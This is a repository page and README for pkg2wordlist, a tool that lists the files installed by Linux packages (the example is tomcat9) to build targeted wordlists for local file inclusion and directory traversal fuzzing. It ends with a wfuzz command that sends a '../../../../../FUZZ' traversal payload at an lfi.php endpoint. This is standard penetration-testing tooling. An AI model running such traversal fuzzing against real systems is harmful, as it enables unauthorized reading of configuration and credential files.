~nighthawk/pkg2wordlist

create wordlists out of package contents
51788c58 — Frank Brodbeck 3 months ago
CentOS Support
018ed326 — Frank Brodbeck 3 months ago
no need to maintain list of supported os / distris at two different places
edb921a1 — Frank Brodbeck 3 months ago
more traditional help message

refs

master
browse  log 

clone

read-only
https://git.sr.ht/~nighthawk/pkg2wordlist
read/write
git@git.sr.ht:~nighthawk/pkg2wordlist

You can also use your local clone with git send-email.

#What

Create wordlist for packages. Useful for fuzzing LFIs and Directory Traversals.

#Why

If you know the target it's better to use specific wordlists instead of you general purpose shotgun. It's both quieter and should yield better results.

#Currently supported Distributions

  • Ubuntu
  • Debian
  • Arch
  • CentOS

#How

#Usage

user@attacker:~$ python3 pkg2wordlist.py
usage: pkg2wordlist.py [-h] [-a ARCH] -o {ubuntu,debian,arch,centos} -r
                       RELEASE -p PKG

Felch package contents

  -h                    show this help message
  -a ARCH               arch (default: all)
  -o {ubuntu,debian,arch,centos}
                        distribution/os name
  -r RELEASE            release / repository (e.g. arch)
  -p PKG                packagename

CAVEATS:
The following OS / distris are provided by pkgs.org:

CentOS

for these you need to provide detailed packagenames, e.g. tomcat-7.0.104-1.el6.noarch.rpm

CentOS currently only supports epel

#Retrieve the filelist

user@attacker:~$ ./pkg2wordlist.py -o ubuntu -r focal -a all -p tomcat9
/etc/cron.daily/tomcat9
/etc/rsyslog.d/tomcat9.conf
/etc/tomcat9/policy.d/01system.policy
/etc/tomcat9/policy.d/02debian.policy
/etc/tomcat9/policy.d/03catalina.policy
/etc/tomcat9/policy.d/04webapps.policy
/etc/tomcat9/policy.d/50local.policy
/lib/systemd/system/tomcat9.service
/usr/lib/sysusers.d/tomcat9.conf
/usr/lib/tmpfiles.d/tomcat9.conf
/usr/libexec/tomcat9/tomcat-start.sh
/usr/libexec/tomcat9/tomcat-update-policy.sh
/usr/share/doc/tomcat9/README.Debian
/usr/share/doc/tomcat9/changelog.Debian.gz
/usr/share/doc/tomcat9/copyright
/usr/share/tomcat9-root/default_root/META-INF/context.xml
/usr/share/tomcat9-root/default_root/index.html
/usr/share/tomcat9/default.template
/usr/share/tomcat9/etc/catalina.properties
/usr/share/tomcat9/etc/context.xml
/usr/share/tomcat9/etc/jaspic-providers.xml
/usr/share/tomcat9/etc/logging.properties
/usr/share/tomcat9/etc/server.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/usr/share/tomcat9/etc/web.xml
/usr/share/tomcat9/logrotate.template
/var/lib/tomcat9/conf
/var/lib/tomcat9/logs
/var/lib/tomcat9/work

#Save the wordlist and use it with wfuzz

user@attacker:~$ ./pkg2wordlist.py -o ubuntu -r focal -a all -p tomcat9 > ubuntu-focal-tomcat9.wordlist
user@attacker:~$ wfuzz -c -w ubuntu-focal-tomcat9.wordlist -Z http://198.51.100.1/lfi.php=../../../../../FUZZ